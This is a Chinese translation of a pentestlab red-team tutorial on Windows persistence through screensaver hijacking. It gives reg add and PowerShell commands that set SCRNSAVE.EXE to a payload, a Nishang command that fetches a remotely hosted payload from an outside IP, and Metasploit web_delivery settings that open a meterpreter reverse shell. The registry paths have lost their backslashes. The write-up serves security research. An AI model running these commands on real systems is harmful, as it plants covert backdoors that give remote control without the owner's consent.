Window許可權維持（五）：螢幕保護程式

螢幕保護是Windows功能的一部分，使使用者可以在一段時間不活動後放置螢幕訊息或圖形動畫。眾所周知，Windows的此功能被威脅參與者濫用為永續性方法。這是因為螢幕保護程式是具有.scr副檔名的可執行檔案，並通過scrnsave.scr實用程式執行。

螢幕保護程式設定儲存在登錄檔中，從令人反感的角度來看，最有價值的值是：

HKEY_CURRENT_USERControl PanelDesktopSCRNSAVE.EXE
HKEY_CURRENT_USERControl PanelDesktopScreenSaveActive
HKEY_CURRENT_USERControl PanelDesktopScreenSaverIsSecure
HKEY_CURRENT_USERControl PanelDesktopScreenSaveTimeOut
 

螢幕保護程式–登錄檔項

可以通過命令提示符或從PowerShell控制檯修改或添加註冊表項。由於.scr檔案本質上是可執行檔案，因此兩個副檔名都可以用於後門植入。

reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmppentestlab.exe
reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmppentestlab.scr
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmppentestlab.exe'
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmppentestlab.scr'
 

添加註冊表項– CMD和PowerShell

一旦機器不活動時間段過去，將執行任意有效載荷，並且將再次建立命令和控制的通訊。

螢幕保護程式– Meterpreter

Nishang框架包含一個PowerShell指令碼，該指令碼也可以執行此攻擊，但與上述方法相比，它需要管理級別的特權，因為它在本地計算機中使用登錄檔項來儲存將執行遠端託管有效負載的PowerShell命令。這種技術的好處是它不會接觸磁碟。

Import-Module .Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.145:8080/Bebr7aOemwFJO
 

Nishang –螢幕保護程式後門

在這種情況下，可以使用Metasploit Web交付模組生成並託管PowerShell負載。一旦使用者會話變為空閒，螢幕保護程式將執行PowerShell負載，然後將開啟一個meterpreter會話。

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set LHOST IP_Address
set target 2exploit

Meterpreter –螢幕保護程式

利用螢幕保護程式的永續性技術的問題在於，當用戶返回並且系統未處於空閒模式時，會話將中斷。但是，紅隊可以在使用者不在時執行其操作。如果螢幕保護程式被組策略禁用，則該技術不能用於永續性。

譯文宣告：本文由Bypass整理並翻譯，僅用於安全研究和學習之用。
原文地址：https://pentestlab.blog/2019/10/09/persistence-screensaver/

本文作者：Bypass007

本文為安全脈搏專欄作者釋出，轉載請註明：https://www.secpulse.com/archives/119993.html